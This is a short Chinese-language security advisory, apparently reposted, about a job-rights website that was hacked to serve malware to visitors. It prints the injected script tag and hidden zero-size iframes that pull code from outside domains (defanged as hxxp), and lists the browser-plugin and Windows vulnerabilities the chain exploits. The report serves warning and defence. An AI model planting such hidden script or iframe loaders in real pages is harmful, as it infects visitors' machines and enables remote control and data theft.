| 关键词: 漏洞 代码 问题 框架 hxxp 用户 恶意 病毒 33.2288 IERPCtl |
就业维权网(hxxp://www.526job.com/)被黑客植入病毒,用户如果访问该网页,系统就会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制,盗取用户敏感信息。甚至导致死机。 该网站问题代码: <script src=hxxp://3b3.org/c.js></script> hxxp://3b3.org/c.js问题框架代码: <iframe src=hxxp://vwwew33.2288.org/a/a100.htm width=0 height=0></iframe> hxxp://vwwew33.2288.org/a/a100.htm问题框架代码: <iframe src="cnzz.htm" width=111 height=0 border=0></iframe> hxxp://vwwew33.2288.org/a/cnzz.htm问题框架代码 经解密后,发现该挂马网页通过以下几个漏洞进行传播: MS06-014漏洞 Adobe Flash Player SWF文件漏洞 Qvod Player漏洞 RealPlayer播放器IERPCtl.IERPCtl.1漏洞 暴风影音2 mps.dll组件多个缓冲区溢出漏洞 MS09-002漏洞 联众世界GLWorld HanGamePluginCn18类ActiveX控件栈溢出漏洞 MS08-041漏洞 |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|